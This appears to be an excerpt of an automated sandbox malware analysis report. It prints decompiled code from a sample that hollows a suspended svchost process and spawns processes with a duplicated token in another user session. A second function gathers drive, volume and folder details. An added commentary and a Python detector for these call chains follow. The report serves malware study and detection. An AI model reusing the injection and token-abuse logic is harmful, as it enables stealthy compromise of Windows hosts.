                                                            														} else {
                                                            															while(1) {
                                                            																L87:
                                                            																_t185 = E046494D0(_t232, L"Control", _t270, _t286, __eflags);
                                                            																__eflags = _t185;
                                                            																if(__eflags == 0) {
                                                            																}
                                                            																L88:
                                                            																_v2236 = 0;
                                                            																_t188 = E04649620(_t232,  &_v2236, _t270, _t286, __eflags);
                                                            																_t271 = _t188;
                                                            																__eflags = _t188;
                                                            																if(__eflags == 0) {
                                                            																	L86:
                                                            																	_t270 = CloseHandle;
                                                            																} else {
                                                            																	_t261 = _v2236;
                                                            																	__eflags = _v2236;
                                                            																	if(__eflags == 0) {
                                                            																		goto L86;
                                                            																	} else {
                                                            																		_t286 = E04649910(_t271, _t261,  &_v2236);
                                                            																		L04655B0F(_t271);
                                                            																		_t270 = CloseHandle;
                                                            																		_t298 = _t298 + 8;
                                                            																		__eflags = _t286;
                                                            																		if(__eflags != 0) {
                                                            																			__eflags = WaitForSingleObject(_t286, 0xbb8) - 0x102;
                                                            																			if(__eflags == 0) {
                                                            																				CloseHandle(_t286);
                                                            																			}
                                                            																		}
                                                            																		while(1) {
                                                            																			L87:
                                                            																			_t185 = E046494D0(_t232, L"Control", _t270, _t286, __eflags);
                                                            																			__eflags = _t185;
                                                            																			if(__eflags == 0) {
                                                            																			}
                                                            																			goto L88;
                                                            																		}
                                                            																	}
                                                            																	while(1) {
                                                            																		L87:
                                                            																		_t185 = E046494D0(_t232, L"Control", _t270, _t286, __eflags);
                                                            																		__eflags = _t185;
                                                            																		if(__eflags == 0) {
                                                            																		}
                                                            																		goto L93;
                                                            																	}
                                                            																	goto L88;
                                                            																}
                                                            																continue;
                                                            																L93:
                                                            																__eflags = _t185 - 0x1fffffff;
                                                            																if(_t185 == 0x1fffffff) {
                                                            																	do {
                                                            																		_t186 = SetConsoleCtrlHandler(E0464AAF0, 0);
                                                            																		__eflags = _t186;
                                                            																	} while (_t186 != 0);
                                                            																	_t287 = 0x315;
                                                            																} else {
                                                            																	__eflags = _t185 - 0x2fffffff;
                                                            																	if(__eflags != 0) {
                                                            																		_t286 = OpenThread(0x1fffff, 0, _t185);
                                                            																		__eflags = _t286;
                                                            																		if(__eflags == 0) {
                                                            																			goto L88;
                                                            																		} else {
                                                            																			WaitForSingleObject(_t286, 0xffffffff);
                                                            																			CloseHandle(_t286);
                                                            																		}
                                                            																		continue;
                                                            																	} else {
                                                            																		Sleep(0x7d0);
                                                            																		_v2228 = 0;
                                                            																		_t195 = E04649620(_t232,  &_v2228, _t270, _t286, __eflags);
                                                            																		_t286 = _t195;
                                                            																		__eflags = _t195;
                                                            																		if(__eflags == 0) {
                                                            																			continue;
                                                            																		} else {
                                                            																			_t262 = _v2228;
                                                            																			__eflags = _v2228;
                                                            																			if(__eflags == 0) {
                                                            																				continue;
                                                            																			} else {
                                                            																				_t272 = E04649910(_t286, _t262,  &_v2228);
                                                            																				L04655B0F(_t286);
                                                            																				_t298 = _t298 + 8;
                                                            																				__eflags = _t272;
                                                            																				if(__eflags == 0) {
                                                            																					goto L86;
                                                            																				} else {
                                                            																					__eflags = WaitForSingleObject(_t272, 0xbb8) - 0x102;
                                                            																					if(__eflags != 0) {
                                                            																						goto L86;
                                                            																					} else {
                                                            																						CloseHandle(_t272);
                                                            																						E046378B0(_t232, L"Dispatch", 0x2fffffff, CloseHandle, _t286, __eflags);
                                                            																						do {
                                                            																							_t201 = SetConsoleCtrlHandler(E0464AAF0, 0);
                                                            																							__eflags = _t201;
                                                            																						} while (_t201 != 0);
                                                            																						_t287 = 0x315;
                                                            																					}
                                                            																				}
                                                            																			}
                                                            																		}
                                                            																	}
                                                            																}
                                                            																goto L83;
                                                            															}
                                                            														}
                                                            													}
                                                            												} else {
                                                            													__eflags = _v2236 - 0x315;
                                                            													if(__eflags == 0) {
                                                            														goto L82;
                                                            													} else {
                                                            														goto L78;
                                                            													}
                                                            												}
                                                            											}
                                                            										}
                                                            										goto L83;
                                                            									}
                                                            									E0464AAD0();
                                                            									goto L82;
                                                            								}
                                                            							}
                                                            						}
                                                            						L83:
                                                            						_t182 = _v2216;
                                                            						__eflags = _t182;
                                                            						if(_t182 != 0) {
                                                            							CloseHandle(_t182);
                                                            						}
                                                            						return _t287;
                                                            					} else {
                                                            						 *((short*)(_t290 + _t174 - 0x214)) = 0;
                                                            						goto L16;
                                                            					}
                                                            				}
                                                            			}
                                                            0x04649c95
                                                            0x04649acc
                                                            0x04649ad1
                                                            0x04649ad9
                                                            0x04649ae5
                                                            0x04649e51
                                                            0x04649e56
                                                            0x04649e57
                                                            0x04649e58
                                                            0x04649e59
                                                            0x04649e5a
                                                            0x04649e5b
                                                            0x04649e5c
                                                            0x04649e5d
                                                            0x04649e5e
                                                            0x04649e5f
                                                            0x04649e60
                                                            0x04649e66
                                                            0x04649e6e
                                                            0x04649e6f
                                                            0x04649e70
                                                            0x04649e7b
                                                            0x04649e87
                                                            0x04649e93
                                                            0x04649e95
                                                            0x04649e9a
                                                            0x04649e9c
                                                            0x04649ea1
                                                            0x04649ea8
                                                            0x04649eaa
                                                            0x04649eaa
                                                            0x04649eaf
                                                            0x04649eb1
                                                            0x04649eb8
                                                            0x04649eb8
                                                            0x04649eba
                                                            0x04649ec0
                                                            0x04649ec2
                                                            0x04649ec9
                                                            0x04649ec9
                                                            0x04649ecb
                                                            0x04649ecd
                                                            0x04649ed4
                                                            0x04649ed4
                                                            0x04649edf
                                                            0x04649ee7
                                                            0x04649eef
                                                            0x04649ef4
                                                            0x04649ef9
                                                            0x04649eff
                                                            0x04649f90
                                                            0x04649f90
                                                            0x04649f90
                                                            0x04649f05
                                                            0x04649f05
                                                            0x04649f0a
                                                            0x04649f10
                                                            0x00000000
                                                            0x04649f16
                                                            0x04649f1b
                                                            0x04649f20
                                                            0x04649f22
                                                            0x00000000
                                                            0x04649f28
                                                            0x04649f28
                                                            0x04649f28
                                                            0x04649f2d
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f2f
                                                            0x04649f34
                                                            0x00000000
                                                            0x04649f36
                                                            0x04649f44
                                                            0x04649f46
                                                            0x04649f48
                                                            0x00000000
                                                            0x04649f4a
                                                            0x04649f4d
                                                            0x04649f5b
                                                            0x04649f5d
                                                            0x04649f69
                                                            0x04649f77
                                                            0x04649f79
                                                            0x00000000
                                                            0x04649f7b
                                                            0x04649f80
                                                            0x04649f85
                                                            0x04649f87
                                                            0x00000000
                                                            0x04649f89
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x04649fbc
                                                            0x04649fc0
                                                            0x04649fc8
                                                            0x04649fcd
                                                            0x04649fcf
                                                            0x04649fd1
                                                            0x04649fa8
                                                            0x04649fa8
                                                            0x04649fd3
                                                            0x04649fd3
                                                            0x04649fd7
                                                            0x04649fd9
                                                            0x00000000
                                                            0x04649fdb
                                                            0x04649fe6
                                                            0x04649fe9
                                                            0x04649fee
                                                            0x04649ff4
                                                            0x04649ff7
                                                            0x04649ff9
                                                            0x0464a003
                                                            0x0464a008
                                                            0x0464a00b
                                                            0x0464a00b
                                                            0x0464a008
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x00000000
                                                            0x04649fba
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fae
                                                            0x04649fb3
                                                            0x04649fb8
                                                            0x04649fba
                                                            0x04649fba
                                                            0x00000000
                                                            0x04649fba
                                                            0x00000000
                                                            0x04649fae
                                                            0x00000000
                                                            0x0464a00f
                                                            0x0464a00f
                                                            0x0464a014
                                                            0x0464a0f0
                                                            0x0464a0f7
                                                            0x0464a0f9
                                                            0x0464a0f9
                                                            0x0464a0fd
                                                            0x0464a01a
                                                            0x0464a01a
                                                            0x0464a01f
                                                            0x0464a0cb
                                                            0x0464a0cd
                                                            0x0464a0cf
                                                            0x00000000
                                                            0x0464a0d5
                                                            0x0464a0d8
                                                            0x0464a0db
                                                            0x0464a0db
                                                            0x00000000
                                                            0x0464a025
                                                            0x0464a02a
                                                            0x0464a034
                                                            0x0464a03c
                                                            0x0464a041
                                                            0x0464a043
                                                            0x0464a045
                                                            0x00000000
                                                            0x0464a04b
                                                            0x0464a04b
                                                            0x0464a04f
                                                            0x0464a051
                                                            0x00000000
                                                            0x0464a057
                                                            0x0464a062
                                                            0x0464a065
                                                            0x0464a06a
                                                            0x0464a06d
                                                            0x0464a06f
                                                            0x00000000
                                                            0x0464a075
                                                            0x0464a07d
                                                            0x0464a082
                                                            0x00000000
                                                            0x0464a088
                                                            0x0464a08f
                                                            0x0464a09b
                                                            0x0464a0a6
                                                            0x0464a0ad
                                                            0x0464a0af
                                                            0x0464a0af
                                                            0x0464a0b3
                                                            0x0464a0b3
                                                            0x0464a082
                                                            0x0464a06f
                                                            0x0464a051
                                                            0x0464a045
                                                            0x0464a01f
                                                            0x00000000
                                                            0x0464a014
                                                            0x04649fae
                                                            0x04649f87
                                                            0x04649f5f
                                                            0x04649f5f
                                                            0x04649f67
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04649f67
                                                            0x04649f5d
                                                            0x04649f48
                                                            0x00000000
                                                            0x04649f34
                                                            0x04649f8b
                                                            0x00000000
                                                            0x04649f8b
                                                            0x04649f22
                                                            0x04649f10
                                                            0x04649f92
                                                            0x04649f92
                                                            0x04649f96
                                                            0x04649f98
                                                            0x04649f9b
                                                            0x04649f9b
                                                            0x04649fa5
                                                            0x04649aeb
                                                            0x04649aed
                                                            0x00000000
                                                            0x04649aed
                                                            0x04649ae5

                                                            APIs
                                                            • GetVersionExW.KERNEL32(00000114,?,?,?,00000000,00000000,74D0F750), ref: 046499A1
                                                              • Part of subcall function 04645CA0: GetCurrentProcessId.KERNEL32(?,74CB4DC0), ref: 04645CB5
                                                              • Part of subcall function 04645CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04645CCB
                                                              • Part of subcall function 04645CA0: Process32FirstW.KERNEL32(00000000,0000022C), ref: 04645CE5
                                                              • Part of subcall function 04645CA0: Process32NextW.KERNEL32(00000000,0000022C), ref: 04645D06
                                                              • Part of subcall function 04645CA0: FindCloseChangeNotification.KERNEL32(00000000), ref: 04645D1C
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,00000000,00000000,74D0F750), ref: 046499DD
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,00000000,00000000,74D0F750), ref: 046499FB
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649A02
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,00000000,00000000,74D0F750), ref: 04649A10
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649A17
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04649ABB
                                                            • wsprintfW.USER32 ref: 04649B08
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSEnumerateSessionsW,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649B35
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649B3C
                                                              • Part of subcall function 04645D40: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D58
                                                              • Part of subcall function 04645D40: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D65
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll,WTSFreeMemory,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649BC4
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649BCB
                                                            • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649BE6
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000048,?), ref: 04649C2A
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649C46
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04649C4D
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649C70
                                                            • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649C8D
                                                            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649CAD
                                                            • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649CC5
                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649CF8
                                                            • OpenProcessToken.ADVAPI32(00000000,0000000B,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D08
                                                            • DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000000,00000001,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D2A
                                                            • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D45
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D5B
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D75
                                                            • CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000048,?), ref: 04649DAA
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649DB9
                                                            • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649DE8
                                                            • SetThreadContext.KERNEL32(?,00010007,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649E09
                                                            • ResumeThread.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649E1D
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649E38
                                                            • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649EC9
                                                            • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,?,00000000,74D0F750), ref: 04649ED4
                                                            • OpenThread.KERNEL32(001FFFFF,00000000,00000000), ref: 04649F3E
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04649F4D
                                                            • GetExitCodeThread.KERNEL32(00000000,?), ref: 04649F55
                                                              • Part of subcall function 0464AAD0: SetConsoleCtrlHandler.KERNEL32(0464AAF0,00000000,00000000,04649F90), ref: 0464AADE
                                                            • CloseHandle.KERNEL32(00000000), ref: 04649F9B
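Read as a whole, the listing above is a process-hollowing routine with a session-aware spawn path. GetSystemDirectoryW and wsprintfW build the "%ssvchost.exe -k WspService" command line; CreateProcessW is called with dwCreationFlags 0x0000000C (CREATE_SUSPENDED | DETACHED_PROCESS) and a 0x48-byte startup-info structure on the stack, the size of STARTUPINFOEXW on x86, which fits the run-time resolution of InitializeProcThreadAttributeList, UpdateProcThreadAttribute and DeleteProcThreadAttributeList. The suspended child then receives VirtualAllocEx with MEM_COMMIT|MEM_RESERVE (0x3000) and PAGE_EXECUTE_READWRITE (0x40), WriteProcessMemory, SetThreadContext with CONTEXT_FULL (0x10007) and ResumeThread. The second spawn path opens the sample's own token (access 0x0B = TOKEN_ASSIGN_PRIMARY | TOKEN_DUPLICATE | TOKEN_QUERY), duplicates it as a primary token (DuplicateTokenEx with MAXIMUM_ALLOWED, TokenType 1), sets TokenSessionId (information class 0xC) to a session obtained through WTSEnumerateSessionsW, and calls CreateProcessAsUserW with the same 0x0C flags; that is why the parent later appears as a system process talking to the network. Whether the attribute list is also used for parent-process spoofing cannot be confirmed from this listing: only the resolution of UpdateProcThreadAttribute is shown, not a call with its attribute id.

The following is an added example, not Joe Sandbox code and not part of the sample: a Python detector that parses lines in this report's "• Api.MODULE(args), ref: ADDR" format and checks them for the two chains above, keying on argument values (the CREATE_SUSPENDED bit, PAGE_EXECUTE_READWRITE, TokenSessionId) rather than on API names alone. It assumes the listing is in address order, which it is (it is the function's static API reference list, not an execution trace), and uses the Windows SDK constants named above; SAMPLE_TRACE is a subset of the listing copied verbatim.

```python
# Added example (not Joe Sandbox code, not the sample's): stage detector for the
# hollowing and token/session spawn chains in the API listing above.
import re
from dataclasses import dataclass
from typing import Optional

CREATE_SUSPENDED = 0x4           # CreateProcess* dwCreationFlags bit
PAGE_EXECUTE_READWRITE = 0x40    # VirtualAllocEx flProtect
TOKEN_SESSION_ID = 0xC           # TOKEN_INFORMATION_CLASS TokenSessionId

# Copied from the report's API listing above (static, address-ordered; not an execution trace).
SAMPLE_TRACE = """
• GetVersionExW.KERNEL32(00000114,?,?,?,00000000,00000000,74D0F750), ref: 046499A1
  • Part of subcall function 04645CA0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04645CCB
• LoadLibraryA.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,00000000,00000000,74D0F750), ref: 046499FB
• LoadLibraryA.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,00000000,00000000,74D0F750), ref: 04649A10
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000048,?), ref: 04649C2A
• VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649CAD
• OpenProcessToken.ADVAPI32(00000000,0000000B,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D08
• DuplicateTokenEx.ADVAPI32(00000000,02000000,00000000,00000000,00000001,00000000,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D2A
• SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649D45
• CreateProcessAsUserW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,00000048,?), ref: 04649DAA
• WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649DE8
• SetThreadContext.KERNEL32(?,00010007,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649E09
• ResumeThread.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,74D0F750), ref: 04649E1D
"""

_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                   r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None   # set for "Part of subcall function" lines

def parse_api_trace(text: str) -> list:
    """Parse report lines into ApiCall records; headings and blank lines are skipped."""
    calls = []
    for m in filter(None, map(_LINE.match, text.splitlines())):
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return calls

def hex_arg(call: ApiCall, index: int) -> Optional[int]:
    """Argument `index` as an int; None for '?' (unknown), strings, or missing."""
    a = call.args[index] if index < len(call.args) else ""
    return int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else None

def creation_flags(call: ApiCall) -> Optional[int]:
    # dwCreationFlags is argument 6 of CreateProcessW/A, 7 of CreateProcessAsUserW/A (hToken first).
    if call.api.startswith("CreateProcessAsUser"):
        return hex_arg(call, 6)
    return hex_arg(call, 5) if call.api.startswith("CreateProcess") else None

def match_sequence(calls: list, stages: tuple) -> Optional[dict]:
    """In-order match: each stage needs a call after the previous stage's call.
    Returns {stage_label: ref} for a complete chain, else None."""
    found, i = {}, 0
    for call in calls:
        label, pred = stages[i]
        if pred(call):
            found[label], i = call.ref, i + 1
            if i == len(stages):
                return found
    return None

# Hollowing tail; predicates key on argument values, not API names alone.
HOLLOWING = (
    ("suspended_spawn", lambda c: ((creation_flags(c) or 0) & CREATE_SUSPENDED) != 0),
    ("rwx_alloc", lambda c: c.api == "VirtualAllocEx" and hex_arg(c, 4) == PAGE_EXECUTE_READWRITE),
    ("remote_write", lambda c: c.api == "WriteProcessMemory"),
    ("hijack_context", lambda c: c.api == "SetThreadContext"),
    ("resume", lambda c: c.api == "ResumeThread"),
)
# Own token duplicated, TokenSessionId rewritten, process spawned into that session.
TOKEN_SESSION_SPAWN = (
    ("open_token", lambda c: c.api == "OpenProcessToken"),
    ("duplicate", lambda c: c.api == "DuplicateTokenEx"),
    ("set_session", lambda c: c.api == "SetTokenInformation" and hex_arg(c, 1) == TOKEN_SESSION_ID),
    ("spawn_as_user", lambda c: c.api.startswith("CreateProcessAsUser")),
)

def proc_thread_attribute_imports(calls: list) -> list:
    """PROC_THREAD_ATTRIBUTE helpers resolved at run time; in this report format the
    names show up as string arguments on the LoadLibraryA/GetProcAddress lines."""
    wanted = {"InitializeProcThreadAttributeList", "UpdateProcThreadAttribute", "DeleteProcThreadAttributeList"}
    return sorted({a for c in calls if c.api in ("LoadLibraryA", "GetProcAddress") for a in c.args if a in wanted})

def analyse(text: str) -> dict:
    calls = parse_api_trace(text)
    return {"hollowing": match_sequence(calls, HOLLOWING),
            "token_session_spawn": match_sequence(calls, TOKEN_SESSION_SPAWN),
            "proc_thread_attrs": proc_thread_attribute_imports(calls)}

if __name__ == "__main__":
    for name, result in analyse(SAMPLE_TRACE).items():
        print(f"{name}: {result}")
```

Against SAMPLE_TRACE, analyse() returns the full hollowing chain (04649C2A, 04649CAD, 04649DE8, 04649E09, 04649E1D) and the full token/session chain (04649D08, 04649D2A, 04649D45, 04649DAA). The value-based predicates are what keep the rule from firing on a debugger or installer that also calls WriteProcessMemory: without a suspended spawn and an executable remote allocation in between, match_sequence returns None. On a dynamic API trace the same stage tables apply unchanged, since execution order is then the order of the lines.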
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Close$Handle$AddressLibraryLoadProcThread$Open$CreateCurrentSleepToken$ContextProcess32$AllocChangeCodeConsoleCtrlDirectoryDuplicateExitFindFirstHandlerInformationMemoryNextNotificationObjectResumeSingleSnapshotSystemTerminateToolhelp32UserVersionVirtualWaitWritewsprintf
                                                            • String ID: %ssvchost.exe -k WspService$Control$DeleteProcThreadAttributeList$Dispatch$H$InitializeProcThreadAttributeList$SeAssignPrimaryTokenPrivilege$SeDebugPrivilege$SeIncreaseQuotaPrivilege$SeTcbPrivilege$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$\$kernel32.dll
                                                            • API String ID: 2047191768-3917686819
                                                            • Opcode ID: 9d6858b745af57e8966695f5b542952351d1dddcd87000c09da94b0e3bf2af64
                                                            • Instruction ID: c004e5fdc1a4c5f6d8f6f1416fa54e5b5f30eb271d9a91a38add1e5635789514
                                                            • Opcode Fuzzy Hash: 9d6858b745af57e8966695f5b542952351d1dddcd87000c09da94b0e3bf2af64
                                                            • Instruction Fuzzy Hash: 4B02B8B1A803199BEF249F60DC48B9B77B8FF94710F0445A5E549A6280FF74AE48CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 73%
                                                            			E046348F0(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				short _v1052;
                                                            				short _v2092;
                                                            				struct _SHFILEINFOW _v2788;
                                                            				intOrPtr _v2792;
                                                            				signed int _v2796;
                                                            				union _ULARGE_INTEGER* _v2800;
                                                            				intOrPtr _v2804;
                                                            				signed int _v2808;
                                                            				signed int _v2816;
                                                            				union _ULARGE_INTEGER _v2820;
                                                            				signed int _v2824;
                                                            				union _ULARGE_INTEGER _v2828;
                                                            				signed int _t83;
                                                            				signed int _t98;
                                                            				int _t114;
                                                            				int _t121;
                                                            				signed int _t136;
                                                            				void* _t156;
                                                            				signed int _t157;
                                                            				WCHAR* _t167;
                                                            				intOrPtr* _t168;
                                                            				void* _t170;
                                                            				void* _t175;
                                                            				void* _t176;
                                                            				void* _t178;
                                                            				intOrPtr _t180;
                                                            				intOrPtr _t183;
                                                            				void* _t184;
                                                            				void* _t185;
                                                            				signed int _t186;
                                                            				void* _t187;
                                                            				void* _t191;
                                                            
                                                            				_t157 = __ecx;
                                                            				_t83 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t83 ^ _t186;
                                                            				_v2808 = __ecx;
                                                            				_t156 = LocalAlloc(0x40, 0x800);
                                                            				 *_t156 = 0x68;
                                                            				GetLogicalDriveStringsW(0x208,  &_v2092);
                                                            				_t167 =  &_v2092;
                                                            				asm("xorps xmm0, xmm0");
                                                            				_t175 = 1;
                                                            				asm("movlpd [ebp-0xb00], xmm0");
                                                            				asm("movlpd [ebp-0xb08], xmm0");
                                                            				if(_v2092 != 0) {
                                                            					do {
                                                            						E0465DEA0(_t167,  &_v1052, 0, 0x410);
                                                            						_t191 = _t187 + 0xc;
                                                            						GetVolumeInformationW(_t167, 0, 0, 0, 0, 0,  &_v1052, 0x208);
                                                            						SHGetFileInfoW(_t167, 0x80,  &_v2788, 0x2b4, 0x410);
                                                            						_v2804 = 2 + lstrlenW( &(_v2788.szTypeName)) * 2;
                                                            						_v2792 = 2 + lstrlenW( &_v1052) * 2;
                                                            						_t136 =  *_t167 & 0x0000ffff;
                                                            						if(_t136 == 0x41 || _t136 == 0x42 || GetDiskFreeSpaceExW(_t167,  &_v2828,  &_v2820, 0) == 0) {
                                                            							_v2796 = 0;
                                                            							_v2800 = 0;
                                                            						} else {
                                                            							_v2796 = (_v2816 << 0x00000020 | _v2820.LowPart) >> 0x14;
                                                            							_t157 = (_v2824 << 0x00000020 | _v2828.LowPart) >> 0x14;
                                                            							_v2800 = _t157;
                                                            						}
                                                            						 *((short*)(_t175 + _t156)) =  *_t167;
                                                            						 *((char*)(_t175 + _t156 + 2)) = GetDriveTypeW(_t167);
                                                            						 *(_t175 + _t156 + 6) = _v2796;
                                                            						 *(_t175 + _t156 + 0xa) = _v2800;
                                                            						_t184 = _t175 + 0xe;
                                                            						E0465E060(_t184 + _t156,  &(_v2788.szTypeName), _v2804);
                                                            						_t185 = _t184 + _v2804;
                                                            						E0465E060(_t185 + _t156,  &_v1052, _v2792);
                                                            						_t175 = _t185 + _v2792;
                                                            						_t187 = _t191 + 0x18;
                                                            						_t167 =  &(( &(_t167[lstrlenW(_t167)]))[1]);
                                                            					} while ( *_t167 != 0);
                                                            				}
                                                            				_t168 = __imp__SHGetSpecialFolderPathW;
                                                            				_t176 = _t175 + 2;
                                                            				 *((short*)(_t176 + _t156 - 2)) = 0;
                                                            				 *_t168(0,  &_v1052, 0x10, 0);
                                                            				E0465E060(_t176 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
                                                            				_t98 = lstrlenW( &_v1052);
                                                            				_t178 = _t176 + _t98 * 2 + 2;
                                                            				 *_t168(0,  &_v1052, 5, 0);
                                                            				E0465E060(_t178 + _t156,  &_v1052, 2 + lstrlenW( &_v1052) * 2);
                                                            				_t180 = _t178 + lstrlenW( &_v1052) * 2 + 2;
                                                            				_v2792 = _t180;
                                                            				_t170 = E046347A0();
                                                            				if(_t170 != 0) {
                                                            					_t114 = LocalSize(_t170);
                                                            					if(_t180 + _t114 <= LocalSize(_t156)) {
                                                            						_t183 = _v2792;
                                                            					} else {
                                                            						_t121 = LocalSize(_t170);
                                                            						_t183 = _v2792;
                                                            						_t156 = LocalReAlloc(_t156, _t121 + _t183, 0x42);
                                                            					}
                                                            					E0465E060(_t183 + _t156, _t170, LocalSize(_t170));
                                                            					_t180 = _t183 + LocalSize(_t170);
                                                            					LocalFree(_t170);
                                                            				}
                                                            				_push(_t157);
                                                            				_push(0x3f);
                                                            				_push(_t180);
                                                            				E04631C60( *((intOrPtr*)(_v2808 + 4)));
                                                            				LocalFree(_t156);
                                                            				return E04655AFE(_v8 ^ _t186, _t156);
                                                             			}

